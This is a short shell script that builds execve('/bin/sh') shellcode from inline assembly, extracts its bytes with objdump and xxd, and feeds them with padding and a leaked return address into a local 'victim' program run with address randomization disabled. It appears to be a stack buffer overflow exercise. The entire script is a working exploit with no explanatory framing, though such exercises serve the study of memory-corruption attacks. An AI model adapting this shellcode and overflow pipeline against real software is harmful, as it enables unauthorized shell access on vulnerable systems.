#!/bin/sh
echo 'int main() {\n  asm("\\\nneedle0: jmp there\\n\\\nhere:    pop %rdi\\n\\\n         xor %rax, %rax\\n\\\n         movb $0x3b, %al\\n\\\n         xor %rsi, %rsi\\n\\\n         xor %rdx, %rdx\\n\\\n         syscall\\n\\\nthere:   call here\\n\\\n.string \\"/bin/sh\\"\\n\\\nneedle1: .octa 0xdeadbeef\\n\\\n  ");\n}' > shell.c 
gcc shell.c

start=`objdump -d a.out | grep '<needle0>:' | cut -f 1 -d ' '`
end=`objdump -d a.out | grep '<needle1>:' | cut -f 1 -d ' '`
start=$((0x$start-0x400000))
end=$((0x$end-0x400000))
l=$((end-start))
while [ ! $((l % 32)) -eq 0 ]; do l=$((l+1)); done
xxd -s0x`printf %x $start` -l$l -p a.out shellcode

a=$(echo "Camil" | setarch `arch` -R ./victim | head -n1)
a=$(printf %016x $a | tac -rs..)
( ( cat shellcode ; printf "%0464d" 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim